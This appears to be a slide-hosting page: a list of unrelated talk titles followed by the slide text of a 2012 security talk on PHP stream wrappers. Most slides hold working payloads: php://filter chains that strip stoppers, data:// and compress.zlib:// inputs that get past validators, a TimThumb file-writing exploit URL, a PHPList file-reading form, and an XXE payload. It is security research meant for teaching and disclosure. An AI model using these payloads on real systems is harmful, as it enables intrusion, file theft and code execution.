Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 

On secure application of PHP wrappers

  • 1. PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
  • 2. Streams Streams
  • 3. Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
  • 4. Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
  • 5. Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
  • 6. NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
  • 7. Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
  • 8. Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
  • 9. Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
  • 10. Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
  • 11. Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
  • 12. Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
  • 13. File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
  • 14. Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
  • 15. Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • 16. Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
  • 17. Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 18. Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 19. TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
  • 21. Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
  • 22. Partial File Reading in PHPList <= 2.10.13 (II)
  • 23. getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
  • 24. getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
  • 25. Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
  • 26. parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
  • 27. XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
  • 28. Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
  • 29. Thank you for your attention! Questions?